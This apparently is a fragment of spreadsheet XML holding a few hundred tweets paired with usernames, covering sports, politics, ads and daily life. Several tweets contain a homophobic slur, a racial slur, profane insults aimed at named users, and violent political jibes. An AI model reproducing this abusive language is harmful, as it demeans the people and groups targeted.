    <t>Juice5FLA</t>
  </si>
  <si>
    <t>What Makes You a man Is Not The Ability To A Child Its The Courage To Raise One..... Obama</t>
  </si>
  <si>
    <t>emirrendon</t>
  </si>
  <si>
    <t>@kitchenkarpet But wouldn't anarchy make current currency have no value therefore you count redistribute the wealth they have because it is now useless?</t>
  </si>
  <si>
    <t>ThisIsDekko</t>
  </si>
  <si>
    <t>@Snowwi_ wait... YOU GO TO THE GYM ? I NEED MAXES NOW</t>
  </si>
  <si>
    <t>PackersNotes</t>
  </si>
  <si>
    <t>@Bxf73 He's got all the power, and he knows it.</t>
  </si>
  <si>
    <t>GutterHelmetNY</t>
  </si>
  <si>
    <t>Our patented design includes technology to help it work more efficiently and in all types of weather.https://t.co/xt1vxed3qu</t>
  </si>
  <si>
    <t>Rksandhu88</t>
  </si>
  <si>
    <t>Digital art for download on etsy https://t.co/N3qjisiIhb https://t.co/7Xmm7tn9Xy</t>
  </si>
  <si>
    <t>MWMMediaStudio</t>
  </si>
  <si>
    <t>@Steve06015996 @Ryan_Himself ...do not take boob size into account when wanting to speak to a woman. This is NOT objectification. The symbolism can mean they value the person, not the body type. It could also mean they value all bodies equally. Objectification would mean...2/</t>
  </si>
  <si>
    <t>carwithnoname</t>
  </si>
  <si>
    <t>@brexitparty_uk Parliaments sovereignty is only a power that prevents it from control by a foreign nation. The monarchs sovereignty is only agreed by the people in the coronation oath. The people have Ultimate sovereignty. The monarch has broken her oath. Parliament has over reached its power.</t>
  </si>
  <si>
    <t>NTMF4G_85</t>
  </si>
  <si>
    <t>I just registered to vote in my new property and now I'm beginning to think if it was a waste of time?</t>
  </si>
  <si>
    <t>glen_stanbridge</t>
  </si>
  <si>
    <t>@Nigel_Farage @UKLabour Can't wait for Putin to take you out with Novichok for not delivering on what he paid you to do.</t>
  </si>
  <si>
    <t>bbygirlbbygirl</t>
  </si>
  <si>
    <t>my roomate work overnight shift tonight and I am mortified of being in this house by myself at night!</t>
  </si>
  <si>
    <t>Stevel87928696</t>
  </si>
  <si>
    <t>@kyledcheney @AndrewDesiderio Guess corrupt Barr gets more goodies from trump now barr seems to do a lot of blocking and lying and hiding info including the muller report but guess he gets a few backhanders</t>
  </si>
  <si>
    <t>tyfineass_</t>
  </si>
  <si>
    <t>maxine is childish asf for her twitter name lmaoo my kids deadass can’t spell😒😭</t>
  </si>
  <si>
    <t>BevanGibbs</t>
  </si>
  <si>
    <t>Smoked Cape Tulip in Bokal. Not a lot of available feed due to the season but sheep are still getting the available green pick they are after. Good chance for next years pastures to perform! Weedwiper working well. https://t.co/fMDq55vTSd</t>
  </si>
  <si>
    <t>therobobard</t>
  </si>
  <si>
    <t>the torture of the swelling act in his youth: pray you, gentlemen #IsAdvantageToTheCourse #YourHandOfTheManner</t>
  </si>
  <si>
    <t>Steph_A_Nanny</t>
  </si>
  <si>
    <t>@moderndadpages Hey, he had it coming! He was all “come on, y’all!!! Let’s goooooooo!! Switch kicks!” And I was all “go fuck yourself!”</t>
  </si>
  <si>
    <t>TammyAdams1965</t>
  </si>
  <si>
    <t>@JeffreyGuterman @realDonaldTrump You need a reality check...The DEM-NUTS have been WHINING TURDS before CRIME MASTER #HillaryClinton lost the Election</t>
  </si>
  <si>
    <t>GS36986943</t>
  </si>
  <si>
    <t>@JungNihang It was the same during Stalin's Red Purges or Mao's cultural revolution (or even to an extent the French revolution, English civil war). War is controlled violence. Controlled violence is rarely done well and the controls often slip</t>
  </si>
  <si>
    <t>deejayhome</t>
  </si>
  <si>
    <t>@AndrewCastle63 Of course... This was on the ballot paper wasn't it? #Remain voters knew all about this🙄 Didn't They??🤔 https://t.co/pZS1ZtMsaG</t>
  </si>
  <si>
    <t>Charlie__Tweets</t>
  </si>
  <si>
    <t>Very interested for Richard Madely in #TheCircle @C4TheCircle X</t>
  </si>
  <si>
    <t>765Guy</t>
  </si>
  <si>
    <t>@BPmeatpack I’d have to speak up hahaha!</t>
  </si>
  <si>
    <t>dezfez</t>
  </si>
  <si>
    <t>Nargacuga: hides in shadows, wants to mind it's damn business, goes absolutely apeshit when the hunter invades it's space for no reason and starts harrassing it. Me: https://t.co/xDKM5jPwCt</t>
  </si>
  <si>
    <t>Kimah_Love</t>
  </si>
  <si>
    <t>And there are regular men in the world with nice jobs that will treat u amazing too. It's not about money.. If money brought happiness so many rich ppl would not be miserable</t>
  </si>
  <si>
    <t>InverseChained</t>
  </si>
  <si>
    <t>@AKRacingAus Sweet thanks for the link, makes it much easier to follow 😉</t>
  </si>
  <si>
    <t>CHackney15</t>
  </si>
  <si>
    <t>@Ab_847 @jmunderwood64 @MarkAGunnels And the only team to stop Mahomes so far in 2 years.</t>
  </si>
  <si>
    <t>DubbPoets</t>
  </si>
  <si>
    <t>@Sh3SoS3XI I’m sure you like all of the rest of humans are a work in progress and deserve love and friendship... and this type of honesty can give you the right friendship to help you grow so you can have people in your corner that understand you</t>
  </si>
  <si>
    <t>m4howie</t>
  </si>
  <si>
    <t>Perhaps the path to a solution is through surrender today. Thi... More for Libra https://t.co/zAWkgSo6D4</t>
  </si>
  <si>
    <t>ScottStantis</t>
  </si>
  <si>
    <t>Is she the only one? See the full comic at https://t.co/YfwBpmE9sa https://t.co/wtNJ1TfsOH</t>
  </si>
  <si>
    <t>discotekmobile</t>
  </si>
  <si>
    <t>@karenwales66 I like your thought but I wish people would stop referring to Marriage and the need for a divorce settlement, its a bloody co-oparative which we have chosen to leave, you do not need to compensate!!</t>
  </si>
  <si>
    <t>JoePrice77</t>
  </si>
  <si>
    <t>Portugal Could Be a Tax Haven — Not Only for Crypto Traders https://t.co/3u96qgcsOA</t>
  </si>
  <si>
    <t>Robadam69</t>
  </si>
  <si>
    <t>@agnesbookbinder The hardest part is doing that Agnes. Now my (was so independent daughter at 12 wants her father at 13) not all the time but if I hadn't let her grow up a bit ............ :) Well done Lady.</t>
  </si>
  <si>
    <t>oogierulz</t>
  </si>
  <si>
    <t>You were a huge video game player back in the day, you still play, if so what’s your poison? #AskJr</t>
  </si>
  <si>
    <t>byesline</t>
  </si>
  <si>
    <t>@marshallcolston @1043TheFan it has been absent. But so has his productivity. He's been one on one a lot and hasn't got it done. I don't know what else to say. He's been ineffective.</t>
  </si>
  <si>
    <t>ChaKatKimber</t>
  </si>
  <si>
    <t>@crosshyparu @SassyOlli That's exactly what was taught to me and everyone of my age I've known, and it wasn't refuted after high school without actually going into detailed history classes. Mass media didn't say a word against that interpretation for an extremely long time.</t>
  </si>
  <si>
    <t>Stephyxo92</t>
  </si>
  <si>
    <t>Sn always goes when I want to wear this x https://t.co/n3iyUJGkqL</t>
  </si>
  <si>
    <t>Boringstein</t>
  </si>
  <si>
    <t>I rarely block, this is one of the only exceptions https://t.co/dOa3qB6125</t>
  </si>
  <si>
    <t>reignandprosper</t>
  </si>
  <si>
    <t>@methinksright @redsteeze Dreamy ? Is that thd new term for faggot ?</t>
  </si>
  <si>
    <t>stevenJamesLDN</t>
  </si>
  <si>
    <t>@DVATW What the fuck is wrong with you!! No soul!!</t>
  </si>
  <si>
    <t>tunodprincess</t>
  </si>
  <si>
    <t>idk guys I contemplate using communal bathrooms every other hour of the day and I just moved in</t>
  </si>
  <si>
    <t>foreveruatw</t>
  </si>
  <si>
    <t>Our little angel God sent to bless us turns two today! Every time you smile, the world looks and feels better. May your smile always remain on your face and joy never abandon you. Happy Birthday Kelsey! https://t.co/8AMc2xBKRA</t>
  </si>
  <si>
    <t>TheHubbyDaddy</t>
  </si>
  <si>
    <t>@ResisterSiano I find it ironic that some of those countries they @POTUS called shit holes are actually listed as Safer than the USA. Thanks Mitch &amp; Don for being more for themselves and the Cult, then for America</t>
  </si>
  <si>
    <t>JodieBethStone</t>
  </si>
  <si>
    <t>@rachelbarbrass No yeah I totally get what you mean, I just mean I don't understand what point they think they're gonna make, I guess. Names are just names, as evidenced by fire storms stepmother's name being used for felicity. It doesn't alter or dictate the impact or integrity of the character</t>
  </si>
  <si>
    <t>brandonlaw_wx</t>
  </si>
  <si>
    <t>A look at how I woke up and hid under the blankets this morning https://t.co/l9XnadCEgw</t>
  </si>
  <si>
    <t>BolzenBrian</t>
  </si>
  <si>
    <t>@PaulDeCristofo4 @RealProgressUS @dmasley @RealMarcusJCage @ProgDownTicket @RealSteveCox @EclecticRadical @adrielhampton @FrantzRunnem @thnkingmynd @stephlynn1982 @wedeserveBernie @donnaimamTX I think you're misreading his intent. He wants people talking about what automation means to the soul of our workforce and economy. If any of the other candidates took his perspective and ideas, Yang wouldn't be running. He's innovative, and we should see it as refreshing.</t>
  </si>
  <si>
    <t>_MichaelJulian</t>
  </si>
  <si>
    <t>@joheartsart Similar to “girds his loins”</t>
  </si>
  <si>
    <t>chikkerd</t>
  </si>
  <si>
    <t>i ordered bay leaves and sainsburys is delivering coriander... nonsense</t>
  </si>
  <si>
    <t>PogMoThoinTrump</t>
  </si>
  <si>
    <t>@intlpodcastday @podcastawards Is there a list of nominees to look at?</t>
  </si>
  <si>
    <t>johnnyboy806</t>
  </si>
  <si>
    <t>@KPSCALnews Your service and care at the Anaheim Hospital sucks. Nurses keep on passing patient care responsibilities to the next shift who didn’t do it, HIPAA violations, and doctors failed to communicate. No wonder people are striking!</t>
  </si>
  <si>
    <t>KIDdoubleTTA</t>
  </si>
  <si>
    <t>Sara preciavacado called me stupid, hmu for tickets to the fight</t>
  </si>
  <si>
    <t>billygunn1216</t>
  </si>
  <si>
    <t>@CubsFanHan Revamp GW mode with a new character as reward like Fear the Darkness in MSF.</t>
  </si>
  <si>
    <t>ChrisLew717</t>
  </si>
  <si>
    <t>Glad I didn’t wake up at 3am to watch the Redskins make asses of themselves as usual 🤦🏼‍♂️#FireGruden #FireManusky but #HTTR</t>
  </si>
  <si>
    <t>cuspofbeauty</t>
  </si>
  <si>
    <t>🙏🏾🙌🏿 Here’s a song for you… Forever/Beautiful Grace by @kirkfranklin https://t.co/0CyzsYJWmj</t>
  </si>
  <si>
    <t>adesoo_</t>
  </si>
  <si>
    <t>I HAD A WHOLE YEAR TO THINK ABOUT WHAT TO WEAR FOR HALLOWEEN AND I WAITED TOO LONG TO FIGURE IT OUT IM GETTING ANXIOUS ALREADY</t>
  </si>
  <si>
    <t>Chris_X_iSauce</t>
  </si>
  <si>
    <t>Current mood: Sometimes, people hurt you, but Nobody *has* to die today..... https://t.co/oX0AvVbmgm</t>
  </si>
  <si>
    <t>ManiDior</t>
  </si>
  <si>
    <t>Your determination helps you solve a perplexing problem. The s... More for Gemini https://t.co/iT15yv2cnd</t>
  </si>
  <si>
    <t>4ToesInTheOcean</t>
  </si>
  <si>
    <t>@TheArtistStacey Um, 30 days of radiation treatment stops underarm sweating in its tracks for life...there was an easier way???</t>
  </si>
  <si>
    <t>2chis1dogmom</t>
  </si>
  <si>
    <t>I rarely take selfies anymore cause of low self esteem, but I was feeling cute while singing and dancing around my room to Miley Cyrus songs https://t.co/WQgZf86750</t>
  </si>
  <si>
    <t>midwifek</t>
  </si>
  <si>
    <t>@fernhilldammit I wonder if we can privatize Ford and sell him off. In pieces.</t>
  </si>
  <si>
    <t>KebabGazz</t>
  </si>
  <si>
    <t>@NoKnees62 @DavidLammy @BorisJohnson It’s happening over in the states too. It’s pathetic.</t>
  </si>
  <si>
    <t>BillTaylorNY</t>
  </si>
  <si>
    <t>Mets with a big lead. Where have I seen this before? Wheeler needs to go 9 innings today.</t>
  </si>
  <si>
    <t>disastertowncos</t>
  </si>
  <si>
    <t>This cyber bodysuit is coming out so cool, I feel very lucky people are into my original designs so I get the opportunity to make them reality :)</t>
  </si>
  <si>
    <t>HilalSuhaib</t>
  </si>
  <si>
    <t>#climatechange expert on @GMB tells @PiersMorgan there's 8.5 yrs left before we lose coral reefs for good, lose the Arctic forever and reach a point of no return, Morgan says it's an "interesting debate" and wonders if @GretaThunberg is being "exploited". https://t.co/60zt9oR8hM</t>
  </si>
  <si>
    <t>ghstprincess</t>
  </si>
  <si>
    <t>@RonnieLos bless you for this ronnie</t>
  </si>
  <si>
    <t>fatmaniac99</t>
  </si>
  <si>
    <t>@getjeda Hi this response was over two weeks ago. I have yet to even receive an email regarding my order. When is this going to ship? I have been promised several times now that it was shipping out “this week”. It’s getting pretty frustrating</t>
  </si>
  <si>
    <t>USCHSsoccer</t>
  </si>
  <si>
    <t>Lady Panthers up 1-0 at 8 minutes. Goal by Carson Bogan.</t>
  </si>
  <si>
    <t>Thomas72244712</t>
  </si>
  <si>
    <t>He's not ADOS but he is my neighbor and a good guy who needs a little help so I decided to help him if I can! I'm raising money for Frmly Homeless Army Reserve Vet needs work shoes. Click to Donate: https://t.co/w63YBmoj4V via @gofundme</t>
  </si>
  <si>
    <t>MclachlanMason</t>
  </si>
  <si>
    <t>@StephenHooker11 @AwayDaysVideos Sex offenders list for you mate</t>
  </si>
  <si>
    <t>carol04208072</t>
  </si>
  <si>
    <t>@SeriusLeeee @realDonaldTrump ... the hallways. What kind of world is this?</t>
  </si>
  <si>
    <t>js_edit</t>
  </si>
  <si>
    <t>@BravelyWriting It was nice of those folks to bring the dining room chairs out to the back yard. My momma would never do that.</t>
  </si>
  <si>
    <t>ChloeMugg</t>
  </si>
  <si>
    <t>@ThreeDailey Write her a letter and give her cash. I'd love that as a gift if my kids were grown up lol sentimental and practical</t>
  </si>
  <si>
    <t>krististark</t>
  </si>
  <si>
    <t>@ericarhodes I excel at this - especially carrying everything to the car without a bag afterward. Total masochist.</t>
  </si>
  <si>
    <t>Nemoticon</t>
  </si>
  <si>
    <t>@matthewgarside3 @Boxing_Exposure He's not that small... taller than Povetkin, Takam, Chisora people like Whyte and Parker are only an inch taller. They are naturally heavier, so that will be interesting to see. Remember what Holyfield did when he moved up into HW!</t>
  </si>
  <si>
    <t>baghdadriggz</t>
  </si>
  <si>
    <t>@TheRealTayRoc Y’all look like a group of bad ass kids from the hood that found out y’all all can sing and named y’all selves the foster kids 😂😂😂</t>
  </si>
  <si>
    <t>Lord_Steerforth</t>
  </si>
  <si>
    <t>Who are these grinning loons? What sort of moron would pose like this under a sign that represents one of the greatest tragedies in history? I despair. #Auschwitz https://t.co/QsEYq5bxbP</t>
  </si>
  <si>
    <t>talkinboutsmash</t>
  </si>
  <si>
    <t>@Reecefoe Everybody wiping noses n shit 😂🥴 the ghettttoooo</t>
  </si>
  <si>
    <t>AzAboudi</t>
  </si>
  <si>
    <t>I posted a new video to Facebook https://t.co/Xi47ZH86jm</t>
  </si>
  <si>
    <t>SPNGY_Demigod</t>
  </si>
  <si>
    <t>@ChildishVegito "Have you heard the good word about our lord and savior ToD?"</t>
  </si>
  <si>
    <t>danielofdc</t>
  </si>
  <si>
    <t>@Robert_Perry1 Do me a favor, sweetheart and go fuck yourself.</t>
  </si>
  <si>
    <t>TBTimesBiz</t>
  </si>
  <si>
    <t>Among the Grove’s tenants are T.J. Maxx, Ross Dress For Success, Dick’s Sporting Goods, Best Buy, Dollar Tree, Michael’s and Cobb Theater. https://t.co/dIYzSWbOXY</t>
  </si>
  <si>
    <t>OutcastHero72</t>
  </si>
  <si>
    <t>MOST REVIEWED MATTRESS - 5 STARS! - ENHANCED SPINAL ALIGNMENT - BREATHABLE AND COOL. GET PUFFY 100% RISK-FREE PUFFY WILL BE THE MOST COMFORTABLE MATTRESS YOU'VE EVER SLEPT ON GUARANTEED OR WE'LL HAPPILY GIVE YOU A REFUND https://t.co/i6pNvrfu9d via @pinterest</t>
  </si>
  <si>
    <t>Elizabeth13612</t>
  </si>
  <si>
    <t>@washingtonpost Reminds me of the abusive husband telling his wife, see what you made me do, now say you’re sorry . . .</t>
  </si>
  <si>
    <t>Paul_S_Bmore</t>
  </si>
  <si>
    <t>@6ft4NoAirPods But route running does matter in Madden, there is a attribute for that and if it’s in the game it’s in the game.</t>
  </si>
  <si>
    <t>Ishaq7866</t>
  </si>
  <si>
    <t>Bengaluru traffic cop gets praised for clearing a waterlogged street https://t.co/SylyiCYbtF</t>
  </si>
  <si>
    <t>Lil_Socks</t>
  </si>
  <si>
    <t>@WaddleSavanna I am making high pitch noises of anger and shock only people under the age of 25 can hear</t>
  </si>
  <si>
    <t>OutragedPhD</t>
  </si>
  <si>
    <t>@bschapiroMD @sassistheword You can make numbers say whatever you want, basically. People don't read these things critically. And that's a shame.</t>
  </si>
  <si>
    <t>ElliottMozley</t>
  </si>
  <si>
    <t>@SkyZillahRBX ALL UGC hats are reviewed by QA afaik. so Roblox have clearly given tara permission to make these hats.</t>
  </si>
  <si>
    <t>TGCCG</t>
  </si>
  <si>
    <t>Living with a health condition means how you feel can change from day to day. Listen to your body and do what feels comfortable. Visit https://t.co/prr9cJu9w8 to find ways to get moving that work for you. #WeAreUndefeatable @undefeatable https://t.co/j8U9MdLAe7</t>
  </si>
  <si>
    <t>_EVIE___</t>
  </si>
  <si>
    <t>Real question tho. How the fuck can i get @KAYTRANADA beat. Aha</t>
  </si>
  <si>
    <t>Cornye_West</t>
  </si>
  <si>
    <t>@theRealFacted @Giants Against a team that will probably pick in the top 6 this draft</t>
  </si>
  <si>
    <t>Steph2DaKnee</t>
  </si>
  <si>
    <t>Praying for better things to come!!🙏🏼</t>
  </si>
  <si>
    <t>wgohijazi</t>
  </si>
  <si>
    <t>@aliistooshort being considerate is offering help and resources to an actual crackhead. call them what they are and give them a reality check as well as help. you can do both</t>
  </si>
  <si>
    <t>aronwatson21</t>
  </si>
  <si>
    <t>@planty95 @jcpnsons @GaryLineker @ChelseaFC @LFC How was he ment to move he was about 2ft away from him and ran straight into him. Let me guess this is your year again 🙄🙄</t>
  </si>
  <si>
    <t>demhaanas</t>
  </si>
  <si>
    <t>@abzsaidsym R u gonna go to work for me</t>
  </si>
  <si>
    <t>djknightman</t>
  </si>
  <si>
    <t>Episode 144 - Alfred Hitchcock (Part 2) - meanstreetspodcasts: The master of suspense was born 120 years ago today, and we’re saluting Alfred Hitchcock with one of his classic films recreated for radio. Ray Milland and Frank Lovejoy star in the... https://t.co/DRvLLFCL2q</t>
  </si>
  <si>
    <t>trustinnsuk</t>
  </si>
  <si>
    <t>There's some unmissable Live Sport happening across #SkySports this weekend and Monday, including #Rugby, #PremierLeague #Football and The #Ashes! Starting tonight with the #RugbyLeague! Are you showing any in your #pub? #Cricket #PL #UKPubs #England #Wales #Australia https://t.co/xE4Zqokmvn</t>
  </si>
  <si>
    <t>BigKidsKollect</t>
  </si>
  <si>
    <t>@Baseball44Life Not a lot of value for non premium insert RCs</t>
  </si>
  <si>
    <t>ohsurvive</t>
  </si>
  <si>
    <t>@YoungJazzyHo Yeah, him and Jenna annoy the fuck outta me which makes him less likable in every other scene. Noir reminds of every girl who thinks they’re hot shit and they aren’t.</t>
  </si>
  <si>
    <t>DrewMarshall256</t>
  </si>
  <si>
    <t>@MatinaJewell @NzAdvice Bright red certainly makes a statement and gets the audience's attention Matina 👍👌😉</t>
  </si>
  <si>
    <t>amadarisss</t>
  </si>
  <si>
    <t>@PilesOfTheRiles @bayedwardz Shania and Dolly and Bassnec songs</t>
  </si>
  <si>
    <t>Taff107</t>
  </si>
  <si>
    <t>@LeahRemini It's a shame that there will be no more episodes but you and @MikeRinder have not a fantastic job of bringing this malicious cult out of the shadows and into the light. You both have been a great inspiration</t>
  </si>
  <si>
    <t>JackofHearts54</t>
  </si>
  <si>
    <t>@michelle_spenc @Sarah_SKG_1983 @Jennie30041 @RoseSage6 @MccarronPetra1 @SusinBailey4 @KathrynMeissne1 @Olivia10m @putinsgay @simplyjustbeing @JacobCat4 @RENEEWEATHERS2 @phyllisj1003 @BBB1022 @BriansNewHeart @RhymesRadical @ItsJeffHudson @huladiablo @heyjude831 @DerekGuberney @DianaGeorgina15 @DoYouEvenLIf @nomorefreebeer @Jmndad @WomanRises @jbm32753 @therealkevinTE @Scoot4002 @ResisterForever @rollbarann @TatoMHR @VictoriaLAlbers @ladewd1 @chicola_nola @Super_woman2730 @claudiadiazxoxo @Nicoxw1 @SnarkLikeKnives @proud2bLib @PollyPapaya @7brdgesroad @CitizenWonk @TalkToMeForReal @pandorable1968 @IamMultiversal @ivyjofreeman @lil_mother @jrbslc @Samiknowsbest1 @andthenthree Thanks Michelle for the mention 😊 https://t.co/ZxF4dvOt8p</t>
  </si>
  <si>
    <t>ndchiappini</t>
  </si>
  <si>
    <t>@RaymondGamache2 @ChemRxiv Thanks! Dreaming up substrates that show scope succinctly is one of my favorite parts of methodology.</t>
  </si>
  <si>
    <t>MrBadiner</t>
  </si>
  <si>
    <t>Educators! Don't miss the chance for free access to @calm. Click the link below and sign up for FREE access! It is AWESOME! https://t.co/VvShy6bGIb</t>
  </si>
  <si>
    <t>Mo_Wood</t>
  </si>
  <si>
    <t>I'm either drunk, or it tastes nearly identical to their Equinox. - Drinking a Throwback IPA by Grand Avenue Brewing Company @ Grand Avenue Brewing Company — https://t.co/tv3Voq9oD6</t>
  </si>
  <si>
    <t>ebysports</t>
  </si>
  <si>
    <t>@AdamSchiff Consider it more of a warning and heads up dumbass</t>
  </si>
  <si>
    <t>lilbilly412</t>
  </si>
  <si>
    <t>@bigvon This is 2 weeks too late I was just in the Bay Area smh</t>
  </si>
  <si>
    <t>sefbby</t>
  </si>
  <si>
    <t>@muvafxcka @jayroshanee Urmmm no k don’t join the mean party</t>
  </si>
  <si>
    <t>KorRadio</t>
  </si>
  <si>
    <t>Now playing Till The End Of The Day by #TheKinks! #tothekor</t>
  </si>
  <si>
    <t>lyricoctober</t>
  </si>
  <si>
    <t>I’m about to start doing open mics. Just walk in, fuck a nigga club up &amp; dip.</t>
  </si>
  <si>
    <t>alex__Himself</t>
  </si>
  <si>
    <t>@Eugenekumah Chale Kumah, Some shawty really for come do this bank money heist cosss 😂😂😂</t>
  </si>
  <si>
    <t>H4ndsomeDan</t>
  </si>
  <si>
    <t>@ChandranTheMan 9. Me and Virgil gonna take over the world Pinky &amp; The Brain style.</t>
  </si>
  <si>
    <t>ColorOfGrey</t>
  </si>
  <si>
    <t>@WayxgaN @CUcrootin I wish more of us had this clarity &amp; respect. It feels like we've gone mad with isolation, but the irony is that we didn't do it last time, &amp; instead we're doing it after an unprecedented historical season? Culture has a mind of its own, unfortunately.</t>
  </si>
  <si>
    <t>DSweetlovato</t>
  </si>
  <si>
    <t>@uwukoook @gnagxoxo @kjisrosie Yall was crying for that girl who was not even related to you</t>
  </si>
  <si>
    <t>Momster_of_2</t>
  </si>
  <si>
    <t>@brhodes The current occupant of the White House was put there by Putin and the majority of Americans voted against him, just like the majority of Americans oppose racism. Unfortunately we need to learn to not be a silent majority.</t>
  </si>
  <si>
    <t>TacoBelko</t>
  </si>
  <si>
    <t>@925XTU South Jersey Pre-K Special Ed teacher here! I love that I'm these kids' FIRST impression of school! Looking for help to make learning hands on &amp; fun! It all starts somewhere.. #clearthelists #clearthelistnj https://t.co/J19NnPRCOL</t>
  </si>
  <si>
    <t>CDNlegacy</t>
  </si>
  <si>
    <t>"Sgt. Tommy Prince represents the story of many Indigenous veterans who were not treated equitably when they came back from the foreign battlefields, facing oftentimes discrimination, illness and poverty," https://t.co/R9n1MTZjzG #canadianveterans #veterans #caf #supportourtroops</t>
  </si>
  <si>
    <t>Steelersjodie</t>
  </si>
  <si>
    <t>Excited to have @AVID_All_Star here coaching us today with @AVIDExcel workshop @FCHammond @ACPSk12 Trajectory changer for our long term ELs! @FCHPrincipal @DrHutchings https://t.co/a0JRj4qfiN</t>
  </si>
  <si>
    <t>KateRoyko</t>
  </si>
  <si>
    <t>Gonna need a new/better job asap. Not sure I can do this anymore. It's definitely time for a change *sigh*</t>
  </si>
  <si>
    <t>fgif</t>
  </si>
  <si>
    <t>@BLMC88 @tmajic The one from this tweet is the actual one I sent and have haha. Got mixed up somehow.</t>
  </si>
  <si>
    <t>ChrisJefferies2</t>
  </si>
  <si>
    <t>@SportLeeds Just a quick tweet to wish you all a great Monday Afternoon and evening plus a great rest of the week as well</t>
  </si>
  <si>
    <t>jdhaseldenjr</t>
  </si>
  <si>
    <t>What outlandish, yet lavish, clothing. — watching The Hunger Games</t>
  </si>
  <si>
    <t>sammynick</t>
  </si>
  <si>
    <t>#PAPERBALLOTS! #PAPERBALLOTS! #papermotherfuckingballots!!! don't let russia take this next election! we have to get these complicit, sit on their ass and let us all die motherfuckers out of office! ENOUGH OF THE FUCKSHIT! vote lazy ass repugs out of office and VOTE BLUE 2020!</t>
  </si>
  <si>
    <t>fxhytae</t>
  </si>
  <si>
    <t>@goldkpxp You’ll find them on the ww trending page</t>
  </si>
  <si>
    <t>HunnyJax</t>
  </si>
  <si>
    <t>@GlosLiveOnline i hope the Authorities can enter the Camp &amp; Scan All the Dogs in there ?. I am sorry, I DO know that there are many Good Honest people in these communities, but each week it seems, I /We are seeing Missing/Stolen Dogs being 'bought back' or recovered from 'sites' 😪😠</t>
  </si>
  <si>
    <t>AyeVialpando</t>
  </si>
  <si>
    <t>@reedubb And I would’ve blocked that dude that did that to you lol</t>
  </si>
  <si>
    <t>ZiggoSaberCorgi</t>
  </si>
  <si>
    <t>@LuciousLioness Yeah xD it was weird. Spit it out and threw it away for good measure, but had to grab a few pics first xP</t>
  </si>
  <si>
    <t>MichaelCFox2</t>
  </si>
  <si>
    <t>@brikeilarcnn Hard to listen to and watch even when presented with FACTS! https://t.co/34qY1QTwHe</t>
  </si>
  <si>
    <t>chuck_hooper</t>
  </si>
  <si>
    <t>@JonBoeckenstedt Make sure the tag on the back does not say “Made in China”.</t>
  </si>
  <si>
    <t>SlimPickensErik</t>
  </si>
  <si>
    <t>@zabka_zee As a fan of both, I always hated Personas combat. I just don't like turn based JRPGs, but played them for the story. As for Yakuza switch to having turn-based combat, a lot of people got into Yakuza for it's specific combat, so I can see why they're upset there. Still gonna buy</t>
  </si>
  <si>
    <t>DaRealCFGaming</t>
  </si>
  <si>
    <t>@UnicornyLithia @ShinyAquana Same! :3 I'm excited to meet a lot of people.!</t>
  </si>
  <si>
    <t>gabriellaasgaby</t>
  </si>
  <si>
    <t>@alarabofficial LMAO I WAS JUST ABOUT TO SAY, remember how we fooled them all lmao</t>
  </si>
  <si>
    <t>NoMitch2020</t>
  </si>
  <si>
    <t>@JoeNBC 3/#MoscowMitch now also refuses to bring up bipartisan legislation for U.S. Election Security for the 2020 elections. I told you Moscow Mitch is the most corrupt, powerful, unAmerican, traitor known in political history! Russia's already getting their money's worth</t>
  </si>
  <si>
    <t>NeilKenes</t>
  </si>
  <si>
    <t>@NBCNews @MeetThePress It starts from "little on up"- like this song can help us 'sentiment with' maybe... what we teach kids or how we guide them from a young age on up. Hopefully we can spread more positive "ideas" and that can help raise "responsibility".🖤 Love Peace Joy https://t.co/lwrpdqhkpF</t>
  </si>
  <si>
    <t>caleetocokeboy</t>
  </si>
  <si>
    <t>@burnaboy No lies! All his videos truly does that... bring sense of styles and creativity! Damn, Bro is outta here</t>
  </si>
  <si>
    <t>ldreffs</t>
  </si>
  <si>
    <t>“It’s not up to you to fix him” -@PethDerek coming hard with the truth</t>
  </si>
  <si>
    <t>chaseowens96</t>
  </si>
  <si>
    <t>@BleacherReport I'm gonna get one of Tom Hanks, Bob Ross, Keanu Reeves, Adam Sandler, Jennifer Anniston, and Peyton Manning</t>
  </si>
  <si>
    <t>RealBriaNicole_</t>
  </si>
  <si>
    <t>@exact__lee Seriously idk how people can just eat that part🤢 my aunt tears it up 😂😂😂</t>
  </si>
  <si>
    <t>FSS_Soft_Tissue</t>
  </si>
  <si>
    <t>Join the thousands of people that have experienced lasting pain relief. @ Libertyville, Illinois https://t.co/Fd126ShxZc</t>
  </si>
  <si>
    <t>_EricaaYasmeen</t>
  </si>
  <si>
    <t>I’m watching Traffic.............. and I am so upset</t>
  </si>
  <si>
    <t>rjufiar</t>
  </si>
  <si>
    <t>“I still have a dream. It is a dream deeply rooted in the American dream. I have a dream that one day this nation will rise up, live out the true meaning of its creed: ‘We hold these truths to be self-evident, that all men are created equal.’" (August 28, 1963) https://t.co/F1v1vdEPlk</t>
  </si>
  <si>
    <t>smflatow</t>
  </si>
  <si>
    <t>@Jerusalemight Thanks for sending that pic. I’m involved with #Nishmat @NishmatNews and its done terrific work with the Ethiopian community.</t>
  </si>
  <si>
    <t>MrKlondikeBill</t>
  </si>
  <si>
    <t>@WWERDream @WWE @LukeGallowsWWE @KarlAndersonWWE @AJStylesOrg My lord, the size of his head... https://t.co/QlG9BrgwKv</t>
  </si>
  <si>
    <t>mosschops41</t>
  </si>
  <si>
    <t>MK Dons tickets purchased for me and the boys!!! Away day on a school nite 💙⚽️ #itfc</t>
  </si>
  <si>
    <t>kaitlynwaddle</t>
  </si>
  <si>
    <t>Combine your natural talents with the impressive skills of a c... More for Pisces https://t.co/qr0uAkydTT</t>
  </si>
  <si>
    <t>Bryan_1953</t>
  </si>
  <si>
    <t>@HolderStephen Season opener last year I sat next to a middle-aged couple both DECKED in Bengals garb. Biker gear with face paint and wigs, the football gloves. Head to toe. They were awesome neighbors until Doyle fumbled that ball at the end 😂</t>
  </si>
  <si>
    <t>ktburnett</t>
  </si>
  <si>
    <t>I really do laugh at the dumbest shit</t>
  </si>
  <si>
    <t>clarky382</t>
  </si>
  <si>
    <t>@MacBark Mary Berry’s lemon drizzle or some cherry scones with jam and clotted cream, can’t beat a scone x</t>
  </si>
  <si>
    <t>TheSoundLabUK</t>
  </si>
  <si>
    <t>We are #NowPlaying Hesitation by @biasbandoc ~ Check it out at https://t.co/qtRwY56HYA or on the app (Google Play - https://t.co/XziSBnQBpR)</t>
  </si>
  <si>
    <t>AGuyNamedJeff</t>
  </si>
  <si>
    <t>@lesalarice I'm scared to fall in love 😐😐😐</t>
  </si>
  <si>
    <t>FlairandSynch</t>
  </si>
  <si>
